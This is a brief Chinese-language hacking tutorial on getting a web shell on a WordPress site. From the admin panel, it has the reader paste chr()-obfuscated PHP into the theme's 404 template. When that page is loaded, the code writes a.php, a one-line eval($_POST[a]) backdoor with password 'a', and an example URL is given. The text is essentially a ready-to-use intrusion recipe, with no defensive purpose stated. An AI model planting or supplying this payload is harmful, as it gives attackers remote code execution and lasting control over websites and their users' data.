wordpress 拿webshell

进入后台

后台-外观-编辑,找到404的问题插入马,马的代码:

<script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
直接访问你插的主题的404.php就可以了.

http://www.i0day.com/wp-content/themes/default/404.php ,这样就在该目录下生成a.php的一句话,密码是a.